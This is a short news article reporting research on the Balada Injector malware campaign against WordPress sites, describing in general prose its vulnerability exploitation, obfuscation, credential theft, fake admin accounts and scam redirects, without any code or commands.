Balada Injector Malware infected over 1 million WordPress websites
Since 2017, a continuous campaign to spread malware known as Balada Injector is believed to have infected over one million WordPress websites.
The extensive attack, according to GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to compromise WordPress websites. It is known that the attacks occur in waves about every two weeks.
This campaign can be recognised by its predilection for the String.fromCharCode obfuscation, the use of recently registered domain names hosting malicious scripts on random subdomains, and by redirects to numerous fraud websites, according to security expert Denis Sinegubko.
The websites contain bogus tech support, false lottery winnings, and malicious CAPTCHA pages that beg users to enable notifications so that they can “Please Allow to verify, that you are not a robot” in order to deliver spam adverts.
In the intervening years, the Balada Injector has used over 100 domains and a variety of techniques to exploit well-known security holes (such as HTML injection and Site URL), with the attackers mostly seeking to steal database credentials from the wp-config.php file.
The assaults are also designed to read or download arbitrary site files, such as database dumps, log and error files, backups, and search for tools like adminer and phpmyadmin that might have been left behind by site administrators after completing maintenance chores. In the end, the malware enables the creation of phoney WordPress admin users, data harvesting from the hosts’ underlying infrastructure, and the creation of backdoors for ongoing access.
The majority of the time, these websites are owned by the webmaster of the hijacked website, and they all share the same server account and file permissions, according to Sinegubko.
The admin password is brute-forced using a list of 74 predetermined credentials if these attack vectors turn out to be blocked.
In addition to using String.fromCharCode as an obfuscation method, the activity directs victims to booby-trapped URLs that deceive them into activating push notifications by impersonating a bogus CAPTCHA check and serving misleading content.
More over half of the discovered websites had malicious JS code injected into them, according to Unit 42 analysts. One strategy employed by the campaign’s operators was to insert malicious JS code into commonly used JS filenames (like jQuery), which are probably to be present on the homepages of compromised websites.
Since they are more likely to access the website’s home page, legitimate users of the website may be easier to target as a result.
Author: Sanghamitra Sethy